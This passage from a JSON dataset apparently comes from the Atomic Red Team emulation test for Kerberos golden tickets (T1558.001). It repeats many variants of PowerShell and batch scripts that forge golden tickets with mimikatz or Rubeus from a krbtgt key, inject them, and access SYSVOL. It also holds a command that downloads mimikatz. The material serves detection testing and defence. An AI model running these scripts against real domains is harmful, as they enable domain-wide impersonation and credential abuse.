$env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\rubeus.exe\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\rubeus.exe\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n" + ], + "commands": [ + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"S-1-5-21-DEFAULT\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\%userdnsdomain%\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:goldenticketfakeuser /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n $env:TEMP\\mimikatz\\x64\\mimikatz.exe \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$($ENV:logonserver.TrimStart('\\') + \".\" + \"$ENV:userdnsdomain\") /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$($ENV:logonserver.TrimStart('\\') + \".\" + \"$ENV:userdnsdomain\")\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:$ENV:username /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"$Env:temp\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"$Env:temp\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\rubeus.exe\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\rubeus.exe\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.001/T1558.001.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Golden Ticket" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1558.001", + "display_name": "Steal or Forge Kerberos Tickets: Golden Ticket", + "atomic_tests": [ + { + "name": "Crafting Active Directory golden tickets with mimikatz", + "auto_generated_guid": "9726592a-dabc-4d4d-81cd-44070008b3af", + "description": "Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.\nThis test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).\nThe generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain_sid": { + "description": "SID of the targeted domain, if you keep default it will automatically get the current domain SID", + "type": "String", + "default": "S-1-5-21-DEFAULT" + }, + "domain": { + "description": "Targeted Active Directory domain FQDN", + "type": "String", + "default": "%userdnsdomain%" + }, + "account": { + "description": "Account to impersonate", + "type": "String", + "default": "goldenticketfakeuser" + }, + "krbtgt_aes256_key": { + "description": "Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain)", + "type": "String", + "default": "b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9" + }, + "mimikatz_path": { + "description": "Mimikatz windows executable", + "type": "Path", + "default": "$env:TEMP\\mimikatz\\x64\\mimikatz.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})\n", + "prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\nif (Test-Path $mimikatz_path) {exit 0} else {exit 1}\n", + "get_prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\mimikatz.zip\"\nExpand-Archive $env:TEMP\\mimikatz.zip $env:TEMP\\mimikatz -Force\nNew-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null\nMove-Item $env:TEMP\\mimikatz\\x64\\mimikatz.exe $mimikatz_path -Force\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount 